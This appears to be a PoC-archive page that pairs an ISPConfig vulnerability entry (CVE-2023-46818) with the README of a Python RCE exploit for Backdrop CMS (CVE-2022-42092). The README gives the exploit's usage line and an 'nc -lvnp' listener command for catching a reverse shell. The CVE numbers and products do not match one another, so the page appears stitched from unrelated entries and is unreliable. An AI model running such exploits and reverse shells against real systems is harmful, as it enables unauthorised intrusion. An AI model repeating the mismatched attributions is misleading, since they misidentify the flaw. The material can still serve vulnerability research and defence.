关联漏洞
标题:
ISPConfig 安全漏洞
(CVE-2023-46818)
描述:ISPConfig是一套基于Linux的开源主机控制面板,它可通过Web控制面板管理多台服务器、开设网站、监控服务器运行状况等。 ISPConfig 3.2.11p1 之前版本存在安全漏洞,该漏洞源于如果启用了 admin_allow_langedit,管理员可以在语言文件编辑器中实现 PHP 代码注入。
描述
CVE-2023-46818 Python3 Exploit for Backdrop CMS <= 1.22.0 Authenticated Remote Command Execution (RCE)
介绍
# CVE-2022-42092 Python Exploit
## 🔥 Description
This Python exploit script targets an unrestricted file upload in Backdrop CMS to achieve a Remote Code Execution (RCE).
## ⚠️ Affected Versions
Version 1.22.0 and prior version
Note: Backdrop CMS disputes this and argues that advanced permissions are required, which is why it might still exist in versions above 1.22.0. I’m guessing they mean you would need to have admin access first. Still, it’s a valid vulnerability, and it can definitely be exploited to gain full system control.
## ⚙️ Usage
```shell
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
```
Important: Start your listener before running the script:
```shell
nc -lvnp <listener_port>
```
## 💻 Sample Run
## ℹ️ Reference
- [CVE-2022-42092 Detail](https://nvd.nist.gov/vuln/detail/CVE-2022-42092)
文件快照
[4.0K] /data/pocs/1c0e44d6fec5f0fef53a9373599d990614f337cf
├── [6.8K] CVE-2022-42092.py
└── [ 972] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。